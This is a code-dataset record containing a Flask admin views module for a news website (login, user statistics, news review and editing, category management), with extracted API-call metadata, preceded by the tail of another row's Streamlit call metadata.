different classification reports."""'}, {}), "(\n 'The classification report visualizer displays the precision, recall, F1, and support scores for the model. In order to support easier interpretation and problem detection, the report integrates numerical scores with a color-coded heatmap. 
All heatmaps are in the range (0.0, 1.0) to facilitate easy comparison of classification models across different classification reports.'\n )", True, 'import streamlit as st\n'), ((113, 8, 113, 21), 'streamlit.write', 'st.write', ({(113, 17, 113, 20): 'fig'}, {}), '(fig)', True, 'import streamlit as st\n'), ((137, 23, 138, 70), 'streamlit.selectbox', 'st.selectbox', ({(137, 36, 137, 64): '"""Select the type of problem"""', (138, 37, 138, 69): "['classification', 'regression']"}, {}), "('Select the type of problem', ['classification', 'regression'])", True, 'import streamlit as st\n'), ((147, 14, 149, 42), 'yellowbrick.target.FeatureCorrelation', 'FeatureCorrelation', (), '', False, 'from yellowbrick.target import FeatureCorrelation\n'), ((151, 14, 151, 81), 'plotly.express.bar', 'px.bar', (), '', True, 'import plotly.express as px\n'), ((152, 8, 152, 28), 'streamlit.plotly_chart', 'st.plotly_chart', ({(152, 24, 152, 27): 'fig'}, {}), '(fig)', True, 'import streamlit as st\n'), ((99, 12, 99, 24), 'sklearn.naive_bayes.GaussianNB', 'GaussianNB', ({}, {}), '()', False, 'from sklearn.naive_bayes import GaussianNB\n'), ((141, 21, 142, 72), 'streamlit.selectbox', 'st.selectbox', ({(141, 34, 141, 65): '"""Select the correlation method"""', (142, 30, 142, 71): "['mutual_info-classification', 'pearson']"}, {}), "('Select the correlation method', ['mutual_info-classification',\n 'pearson'])", True, 'import streamlit as st\n'), ((144, 21, 145, 70), 'streamlit.selectbox', 'st.selectbox', ({(144, 34, 144, 65): '"""Select the correlation method"""', (145, 32, 145, 69): "['mutual_info-regression', 'pearson']"}, {}), "('Select the correlation method', ['mutual_info-regression',\n 'pearson'])", True, 'import streamlit as st\n'), ((155, 8, 155, 64), 'streamlit.warning', 'st.warning', ({(155, 19, 155, 63): '"""Verify the type of problem that you select"""'}, {}), "('Verify the type of problem that you select')", True, 'import streamlit as st\n'), ((45, 12, 45, 27), 'streamlit.error', 'st.error', ({(45, 21, 45, 26): 'error'}, {}), '(error)', True, 'import streamlit as st\n'), ((46, 12, 46, 29), 'streamlit.error', 'st.error', ({(46, 21, 46, 28): 'featarr'}, {}), '(featarr)', True, 'import streamlit as st\n'), ((47, 12, 47, 21), 'streamlit.stop', 'st.stop', ({}, {}), '()', True, 'import streamlit as st\n')] |
moonbria/test1 | info/modules/admin/views.py | 05893bd91d416ca4093e4619ede427434fa665cc | from flask import request
import random
import re
from flask import current_app, jsonify
from flask import g
from flask import make_response
from flask import redirect
from flask import render_template
from flask import request
from flask import session
from flask import url_for
import time
from info import constants, db
from info import redis_store
from info.lib.yuntongxun.sms import CCP
from info.utils.captcha.captcha import captcha
from info.utils.image_storage import storage
from info.utils.response_code import RET
from info.modules.passport import passport_blu
from info.models import User, Category, News
from info.modules.profile import profile_blu
from info.utils.common import user_login_data
from datetime import datetime, timedelta
from . import admin_blu
@admin_blu.route("/login", methods=["GET", "POST"])
def admin_login():
if request.method == "GET":
# Fetch the saved values from the session
user_id = session.get("user_id", None)
is_admin = session.get("is_admin", False)
if user_id and is_admin:
return redirect(url_for("admin_index"))
return render_template("admin/login.html")
# Get the login parameters
username = request.form.get("username")
password = request.form.get("password")
if not all([username, password]):
return render_template("admin/login.html", errmsg="参数错误")
try:
user = User.query.filter(User.mobile == username).first()
except Exception as e:
current_app.logger.error(e)
return render_template("admin/login.html", errmsg="数据错误")
if not user:
return render_template("admin/login.html", errmsg="用户名错误")
if not user.check_password(password):
return render_template("admin/login.html", errmsg="密码错误")
if not user.is_admin:
return render_template("admin/login.html", errmsg="用户不是管理员")
session["user_id"] = user.id
session["nick_name"] = user.nick_name
session["mobile"] = user.mobile
session["is_admin"] = True
# Redirect to the admin home page (not yet implemented)
return redirect(url_for("admin.admin_index"))
@admin_blu.route("/index")
@user_login_data
def admin_index():
user = g.user
return render_template("admin/index.html", user=user.to_dict())
@admin_blu.before_request
def before_request():
# If the request is not for the login page
if not request.url.endswith(url_for("admin.admin_login")):
user_id = session.get("user_id")
is_admin = session.get("is_admin", False)
if not user_id or not is_admin:
# If no user is logged in, or the user is not an admin, redirect to the site home page
return redirect("/")
@admin_blu.route("/user_count")
def user_count():
# Query the total number of users
total_count = 0
try:
total_count = User.query.filter(User.is_admin == False).count()
except Exception as e:
current_app.logger.error(e)
# Query the number of new users this month
mon_count = 0
try:
now = time.localtime()
mon_begin = "%d-%02d-01" % (now.tm_year, now.tm_mon)
mon_begin_date = datetime.strptime(mon_begin, "%Y-%m-%d")
mon_count = User.query.filter(User.is_admin==False,
User.create_time > mon_begin_date).count()
except Exception as e:
current_app.logger.error(e)
day_count = 0
try:
day_begin = "%d-%02d-%02d" % (now.tm_year, now.tm_mon, now.tm_mday)
day_begin_date = datetime.strptime(day_begin, "%Y-%m-%d")
day_count = User.query.filter(User.is_admin==False,
User.create_time >= day_begin_date).count()
except Exception as e:
current_app.logger.error(e)
# Query the data for the activity chart
# Get the timestamp for 00:00:00 of the current day
now_date = datetime.strptime(datetime.now().strftime("%Y-%m-%d"), "%Y-%m-%d")
print(now_date)
# Define empty lists to hold the data
active_date = list()
active_count = list()
# Append the data day by day, then reverse
for i in range(0, 31):
begin_date = now_date - timedelta(days=i)
end_date = now_date - timedelta(days=(i - 1))
active_date.append(begin_date.strftime("%Y-%m-%d"))
count = 0
try:
count = User.query.filter(User.is_admin == False,
User.last_login >= begin_date,
User.last_login < end_date).count()
print(count)
except Exception as e:
current_app.logger.error(e)
active_count.append(count)
active_date.reverse()
active_count.reverse()
data = {"total_count": total_count, "mon_count": mon_count, "day_count": day_count,
"active_date": active_date, "active_count": active_count}
return render_template("admin/user_count.html", data=data)
@admin_blu.route("/user_list")
def user_list():
"""获取用户列表"""
# 获取参数
page = request.args.get("p", 1)
try:
print(page)
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
# Set default values for the variables
users = []
current_page = 1
total_page = 1
# Query the data
try:
paginate = User.query.filter(User.is_admin == False)\
.order_by(User.last_login.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
users = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
# Convert the model list into a list of dicts
users_list = []
for user in users:
users_list.append(user.to_admin_dict())
context = {
"total_page": total_page,
"current_page": current_page,
"users": users_list
}
return render_template("admin/user_list.html", data=context)
@admin_blu.route("/news_review")
def news_review():
"""返回待审核新闻列表"""
page = request.args.get("p", 1)
keywords = request.args.get("keywords", "")
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = [News.status != 0]
# If keywords were provided
if keywords:
# Add the keyword search filter
filters.append(News.title.contains(keywords))
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_review_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"news_list": news_dict_list
}
return render_template("admin/news_review.html", data=data)
@admin_blu.route("/news_review_detail", methods=["GET", "POST"])
def news_review_detail():
"""新闻审核"""
# 获取新闻id
if request.method == "GET":
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
# Query the news by id
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "未查询到数据"
}
return render_template("admin/news_review_detail.html", data=data)
# Return the data
data = {
"news": news.to_dict()
}
return render_template("admin/news_review_detail.html", data=data)
# Perform the review action
# 1. Get parameters
news_id = request.json.get("news_id")
action = request.json.get("action")
# 2. Validate parameters
if not all([news_id, action]):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
if action not in ("accept", "reject"):
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news = None
try:
# 3. Query the news
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未查询到数据")
if action == "accept":
news.status = 0
else:
# Rejected: a reason must be provided
reason = request.json.get("reason")
if not reason:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
news.reason = reason
news.status = -1
# Save to the database
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="操作成功")
@admin_blu.route("/news_edit", methods=["GET", "POST"])
def news_edit():
"""返回新闻列表"""
page = request.args.get("p", "1")
print(page)
a = re.match(r"^\d*", page)
b = re.findall(r"""keywords=(\w*)""", page)
print(b)
page = a.group()
if b != []:
b = b[0]
keywords = b
else:
keywords = None
b = ""
try:
page = int(page)
except Exception as e:
current_app.logger.error(e)
page = 1
news_list = list()
current_page = 1
total_page = 1
try:
filters = list()
# If keywords were provided
if keywords:
# Add the keyword search filter
filters.append(News.title.contains(keywords))
# Query
paginate = News.query.filter(*filters)\
.order_by(News.create_time.desc())\
.paginate(page, constants.ADMIN_NEWS_PAGE_MAX_COUNT, False)
news_list = paginate.items
current_page = paginate.page
total_page = paginate.pages
except Exception as e:
current_app.logger.error(e)
news_dict_list = list()
for news in news_list:
news_dict_list.append(news.to_basic_dict())
data = {
"total_page": total_page,
"current_page": current_page,
"new_list": news_dict_list,
"last_input": b
}
if request.method == "GET":
return render_template("admin/news_edit.html", data=data)
# return jsonify(errno=RET.OK, errmsg="OK")
return render_template("admin/news_edit.html", data=data)
@admin_blu.route("/news_edit_detail", methods=["GET", "POST"])
def news_edit_detail():
"""新闻编辑详情"""
if request.method == "GET":
# 获取参数
news_id = request.args.get("news_id")
if not news_id:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
# Query the news
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
data = {
"errmsg": "没有找到新闻"
}
return render_template("admin/news_edit_detail.html", data=data)
categories = Category.query.all()
categories_li = []
for category in categories:
c_dict = category.to_dict()
c_dict["is_selected"] = False
if category.id == news.category_id:
c_dict["is_selected"] = True
categories_li.append(c_dict)
# Remove the "latest" category
categories_li.pop(0)
data = {
"news": news.to_dict(),
"categories": categories_li
}
return render_template("admin/news_edit_detail.html", data=data)
news_id = request.form.get("news_id")
title = request.form.get("title")
digest= request.form.get("digest")
content = request.form.get("content")
index_image = request.form.get("index-image")
categery_id = request.form.get("category_id")
# 1.1 Check that the required fields have values:
if not all([title, digest, content, categery_id]):
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
print(title, digest, content, categery_id)
news = None
try:
news = News.query.get(news_id)
except Exception as e:
current_app.logger.error(e)
if not news:
return jsonify(errno=RET.NODATA, errmsg="未找到新闻数据")
# 1.2 Try to read the image
if index_image:
try:
index_image = index_image.read()
except Exception as e:
return jsonify(errno=RET.PARAMERR, errmsg="参数有误")
# 2. Upload the cover image to Qiniu
try:
key = storage(index_image)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.THIRDERR, errmsg="上传图片错误")
news.index_image_url = constants.QINIU_DOMIN_PREFIX + key
# 3. Set the related fields
news.title = title
news.digest = digest
news.content = content
news.category_id = categery_id
# 4. Save to the database
try:
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
# 5. Return the result
return jsonify(errno=RET.OK, errmsg="编辑成功")
@admin_blu.route("/news_category")
def get_news_category():
# Get all the category data
categories = Category.query.all()
# Define a list to hold the category data
categories_dicts = []
for category in categories:
# Get the dict form of the category
cate_dict = category.to_dict()
# Append it to the list
categories_dicts.append(cate_dict)
categories_dicts.pop(0)
# Return the content
data = {
"categories": categories_dicts
}
return render_template("admin/news_type.html", data=data)
@admin_blu.route("/add_category", methods=["POST"])
def add_category():
"""修改或者添加分类"""
category_id = request.json.get("id")
category_name = request.json.get("name")
print(category_name)
if not category_name:
return jsonify(errno=RET.PARAMERR, errmsg="参数错误")
# Check whether a category id was provided
if category_id:
try:
category = Category.query.get(category_id)
except Exception as e:
current_app.logger.error(e)
return jsonify(errno=RET.DBERR, errmsg="查询数据失败")
if not category:
return jsonify(errno=RET.NODATA, errmsg="未查询到分类信息")
category.name = category_name
return jsonify(errno=RET.OK, errmsg="保存数据成功")
else:
# No category id given: add a new category
try:
new_category = Category()
new_category.id = category_id
new_category.name = category_name
db.session.add(new_category)
db.session.commit()
except Exception as e:
current_app.logger.error(e)
db.session.rollback()
return jsonify(errno=RET.DBERR, errmsg="保存数据失败")
return jsonify(errno=RET.OK, errmsg="保存数据成功")
| [((39, 15, 39, 43), 'flask.request.form.get', 'request.form.get', ({(39, 32, 39, 42): '"""username"""'}, {}), "('username')", False, 'from flask import request\n'), ((40, 15, 40, 43), 'flask.request.form.get', 'request.form.get', ({(40, 32, 40, 42): '"""password"""'}, {}), "('password')", False, 'from flask import request\n'), ((145, 11, 145, 62), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((152, 11, 152, 35), 'flask.request.args.get', 'request.args.get', ({(152, 28, 152, 31): '"""p"""', (152, 33, 152, 34): '1'}, {}), "('p', 1)", False, 'from flask import request\n'), ((186, 11, 186, 64), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((192, 11, 192, 35), 'flask.request.args.get', 'request.args.get', ({(192, 28, 192, 31): '"""p"""', (192, 33, 192, 34): '1'}, {}), "('p', 1)", False, 'from flask import request\n'), ((193, 15, 193, 47), 'flask.request.args.get', 'request.args.get', ({(193, 32, 193, 42): '"""keywords"""', (193, 44, 193, 46): '""""""'}, {}), "('keywords', '')", False, 'from flask import request\n'), ((228, 11, 228, 63), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((263, 14, 263, 41), 'flask.request.json.get', 'request.json.get', ({(263, 31, 263, 40): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((264, 13, 264, 39), 'flask.request.json.get', 'request.json.get', ({(264, 30, 264, 38): '"""action"""'}, {}), "('action')", False, 'from flask import request\n'), ((298, 11, 298, 55), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((305, 11, 305, 37), 'flask.request.args.get', 'request.args.get', ({(305, 28, 305, 31): '"""p"""', (305, 33, 305, 36): '"""1"""'}, {}), "('p', '1')", False, 'from flask import request\n'), ((307, 8, 307, 31), 're.match', 're.match', ({(307, 17, 307, 24): '"""^\\\\d*"""', (307, 26, 307, 30): 'page'}, {}), "('^\\\\d*', page)", False, 'import re\n'), ((308, 8, 308, 47), 're.findall', 're.findall', ({(308, 19, 308, 40): '"""keywords=(\\\\w*)"""', (308, 42, 308, 46): 'page'}, {}), "('keywords=(\\\\w*)', page)", False, 'import re\n'), ((355, 11, 355, 61), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((399, 14, 399, 41), 'flask.request.form.get', 'request.form.get', ({(399, 31, 399, 40): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((400, 12, 400, 37), 'flask.request.form.get', 'request.form.get', ({(400, 29, 400, 36): '"""title"""'}, {}), "('title')", False, 'from flask import request\n'), ((401, 12, 401, 38), 'flask.request.form.get', 'request.form.get', ({(401, 29, 401, 37): '"""digest"""'}, {}), "('digest')", False, 'from flask import request\n'), ((402, 14, 402, 41), 'flask.request.form.get', 'request.form.get', ({(402, 31, 402, 40): '"""content"""'}, {}), "('content')", False, 'from flask import request\n'), ((403, 18, 403, 49), 'flask.request.form.get', 'request.form.get', ({(403, 35, 403, 48): '"""index-image"""'}, {}), "('index-image')", False, 'from flask import request\n'), ((404, 18, 404, 49), 'flask.request.form.get', 'request.form.get', ({(404, 35, 404, 48): '"""category_id"""'}, {}), "('category_id')", False, 'from flask import request\n'), ((447, 11, 447, 55), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((453, 17, 453, 37), 'info.models.Category.query.all', 'Category.query.all', ({}, {}), 
'()', False, 'from info.models import User, Category, News\n'), ((468, 11, 468, 61), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((474, 18, 474, 40), 'flask.request.json.get', 'request.json.get', ({(474, 35, 474, 39): '"""id"""'}, {}), "('id')", False, 'from flask import request\n'), ((475, 20, 475, 44), 'flask.request.json.get', 'request.json.get', ({(475, 37, 475, 43): '"""name"""'}, {}), "('name')", False, 'from flask import request\n'), ((32, 18, 32, 46), 'flask.session.get', 'session.get', ({(32, 30, 32, 39): '"""user_id"""', (32, 41, 32, 45): 'None'}, {}), "('user_id', None)", False, 'from flask import session\n'), ((33, 19, 33, 49), 'flask.session.get', 'session.get', ({(33, 31, 33, 41): '"""is_admin"""', (33, 43, 33, 48): 'False'}, {}), "('is_admin', False)", False, 'from flask import session\n'), ((36, 15, 36, 50), 'flask.render_template', 'render_template', ({(36, 31, 36, 49): '"""admin/login.html"""'}, {}), "('admin/login.html')", False, 'from flask import render_template\n'), ((42, 15, 42, 73), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((51, 15, 51, 76), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((54, 15, 54, 73), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((57, 15, 57, 82), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((65, 20, 65, 48), 'flask.url_for', 'url_for', ({(65, 28, 65, 47): '"""admin.admin_index"""'}, {}), "('admin.admin_index')", False, 'from flask import url_for\n'), ((79, 18, 79, 40), 'flask.session.get', 'session.get', ({(79, 30, 79, 39): '"""user_id"""'}, {}), "('user_id')", False, 'from flask import session\n'), ((80, 19, 80, 49), 'flask.session.get', 'session.get', ({(80, 31, 80, 41): '"""is_admin"""', (80, 43, 80, 48): 'False'}, {}), "('is_admin', False)", False, 'from flask import session\n'), ((99, 14, 99, 30), 'time.localtime', 'time.localtime', ({}, {}), '()', False, 'import time\n'), ((101, 25, 101, 65), 'datetime.datetime.strptime', 'datetime.strptime', ({(101, 43, 101, 52): 'mon_begin', (101, 54, 101, 64): '"""%Y-%m-%d"""'}, {}), "(mon_begin, '%Y-%m-%d')", False, 'from datetime import datetime, timedelta\n'), ((110, 25, 110, 65), 'datetime.datetime.strptime', 'datetime.strptime', ({(110, 43, 110, 52): 'day_begin', (110, 54, 110, 64): '"""%Y-%m-%d"""'}, {}), "(day_begin, '%Y-%m-%d')", False, 'from datetime import datetime, timedelta\n'), ((236, 18, 236, 45), 'flask.request.args.get', 'request.args.get', ({(236, 35, 236, 44): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((259, 15, 259, 74), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((268, 15, 268, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((270, 15, 270, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((275, 15, 275, 38), 'info.models.News.query.get', 'News.query.get', ({(275, 30, 275, 37): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((280, 15, 280, 69), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((286, 17, 286, 43), 'flask.request.json.get', 'request.json.get', ({(286, 34, 286, 42): '"""reason"""'}, {}), "('reason')", False, 'from flask import request\n'), 
((293, 8, 293, 27), 'info.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from info import constants, db\n'), ((353, 15, 353, 65), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((363, 18, 363, 45), 'flask.request.args.get', 'request.args.get', ({(363, 35, 363, 44): '"""news_id"""'}, {}), "('news_id')", False, 'from flask import request\n'), ((382, 21, 382, 41), 'info.models.Category.query.all', 'Category.query.all', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((397, 15, 397, 72), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((407, 15, 407, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((411, 15, 411, 38), 'info.models.News.query.get', 'News.query.get', ({(411, 30, 411, 37): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((415, 15, 415, 72), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((440, 8, 440, 27), 'info.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from info import constants, db\n'), ((478, 15, 478, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((491, 15, 491, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((505, 15, 505, 65), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((47, 8, 47, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(47, 33, 47, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((48, 15, 48, 73), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((78, 32, 78, 60), 'flask.url_for', 'url_for', ({(78, 40, 78, 59): '"""admin.admin_login"""'}, {}), "('admin.admin_login')", False, 'from flask import url_for\n'), ((84, 19, 84, 32), 'flask.redirect', 'redirect', ({(84, 28, 84, 31): '"""/"""'}, {}), "('/')", False, 'from flask import redirect\n'), ((94, 8, 94, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(94, 33, 94, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((105, 8, 105, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(105, 33, 105, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((114, 8, 114, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(114, 33, 114, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((126, 32, 126, 49), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((127, 30, 127, 53), 'datetime.timedelta', 'timedelta', (), '', False, 'from datetime import datetime, timedelta\n'), ((157, 8, 157, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(157, 33, 157, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((174, 8, 174, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(174, 33, 174, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((197, 8, 197, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(197, 33, 197, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((217, 8, 217, 28), 'flask.current_app.error', 'current_app.error', ({(217, 26, 217, 27): 'e'}, {}), '(e)', False, 'from flask import current_app, 
jsonify\n'), ((241, 19, 241, 78), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((245, 19, 245, 42), 'info.models.News.query.get', 'News.query.get', ({(245, 34, 245, 41): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((253, 19, 253, 78), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((277, 8, 277, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(277, 33, 277, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((288, 19, 288, 69), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((295, 8, 295, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(295, 33, 295, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((296, 8, 296, 29), 'info.db.session.rollback', 'db.session.rollback', ({}, {}), '()', False, 'from info import constants, db\n'), ((297, 15, 297, 68), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((320, 8, 320, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(320, 33, 320, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((340, 8, 340, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(340, 33, 340, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((368, 19, 368, 76), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((372, 19, 372, 42), 'info.models.News.query.get', 'News.query.get', ({(372, 34, 372, 41): 'news_id'}, {}), '(news_id)', False, 'from info.models import User, Category, News\n'), ((380, 19, 380, 76), 'flask.render_template', 'render_template', (), '', False, 'from flask import render_template\n'), ((413, 8, 413, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(413, 33, 413, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((426, 18, 426, 38), 'info.utils.image_storage.storage', 'storage', ({(426, 26, 426, 37): 'index_image'}, {}), '(index_image)', False, 'from info.utils.image_storage import storage\n'), ((442, 8, 442, 35), 'flask.current_app.logger.error', 'current_app.logger.error', ({(442, 33, 442, 34): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((443, 8, 443, 29), 'info.db.session.rollback', 'db.session.rollback', ({}, {}), '()', False, 'from info import constants, db\n'), ((444, 15, 444, 68), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((482, 23, 482, 54), 'info.models.Category.query.get', 'Category.query.get', ({(482, 42, 482, 53): 'category_id'}, {}), '(category_id)', False, 'from info.models import User, Category, News\n'), ((488, 19, 488, 79), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((496, 27, 496, 37), 'info.models.Category', 'Category', ({}, {}), '()', False, 'from info.models import User, Category, News\n'), ((499, 12, 499, 40), 'info.db.session.add', 'db.session.add', ({(499, 27, 499, 39): 'new_category'}, {}), '(new_category)', False, 'from info import constants, db\n'), ((500, 12, 500, 31), 'info.db.session.commit', 'db.session.commit', ({}, {}), '()', False, 'from info import constants, db\n'), ((35, 28, 35, 50), 'flask.url_for', 'url_for', ({(35, 36, 35, 49): '"""admin_index"""'}, {}), "('admin_index')", False, 'from flask import url_for\n'), 
((45, 15, 45, 57), 'info.models.User.query.filter', 'User.query.filter', ({(45, 33, 45, 56): 'User.mobile == username'}, {}), '(User.mobile == username)', False, 'from info.models import User, Category, News\n'), ((92, 22, 92, 63), 'info.models.User.query.filter', 'User.query.filter', ({(92, 40, 92, 62): 'User.is_admin == False'}, {}), '(User.is_admin == False)', False, 'from info.models import User, Category, News\n'), ((102, 20, 103, 72), 'info.models.User.query.filter', 'User.query.filter', ({(102, 38, 102, 58): 'User.is_admin == False', (103, 38, 103, 71): 'User.create_time > mon_begin_date'}, {}), '(User.is_admin == False, User.create_time > mon_begin_date)', False, 'from info.models import User, Category, News\n'), ((111, 20, 112, 73), 'info.models.User.query.filter', 'User.query.filter', ({(111, 38, 111, 58): 'User.is_admin == False', (112, 38, 112, 72): 'User.create_time >= day_begin_date'}, {}), '(User.is_admin == False, User.create_time >= day_begin_date)', False, 'from info.models import User, Category, News\n'), ((118, 33, 118, 47), 'datetime.datetime.now', 'datetime.now', ({}, {}), '()', False, 'from datetime import datetime, timedelta\n'), ((136, 12, 136, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(136, 37, 136, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((209, 27, 209, 56), 'info.models.News.title.contains', 'News.title.contains', ({(209, 47, 209, 55): 'keywords'}, {}), '(keywords)', False, 'from info.models import User, Category, News\n'), ((247, 12, 247, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(247, 37, 247, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((331, 27, 331, 56), 'info.models.News.title.contains', 'News.title.contains', ({(331, 47, 331, 55): 'keywords'}, {}), '(keywords)', False, 'from info.models import User, Category, News\n'), ((374, 12, 374, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(374, 37, 374, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((422, 19, 422, 69), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((428, 12, 428, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(428, 37, 428, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((429, 19, 429, 75), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((484, 12, 484, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(484, 37, 484, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((485, 19, 485, 72), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((502, 12, 502, 39), 'flask.current_app.logger.error', 'current_app.logger.error', ({(502, 37, 502, 38): 'e'}, {}), '(e)', False, 'from flask import current_app, jsonify\n'), ((503, 12, 503, 33), 'info.db.session.rollback', 'db.session.rollback', ({}, {}), '()', False, 'from info import constants, db\n'), ((504, 19, 504, 72), 'flask.jsonify', 'jsonify', (), '', False, 'from flask import current_app, jsonify\n'), ((131, 20, 133, 64), 'info.models.User.query.filter', 'User.query.filter', ({(131, 38, 131, 60): 'User.is_admin == False', (132, 37, 132, 66): 'User.last_login >= begin_date', (133, 37, 133, 63): 'User.last_login < end_date'}, {}), '(User.is_admin == False, User.last_login >= begin_date, \n User.last_login < end_date)', False, 'from info.models import User, Category, News\n'), 
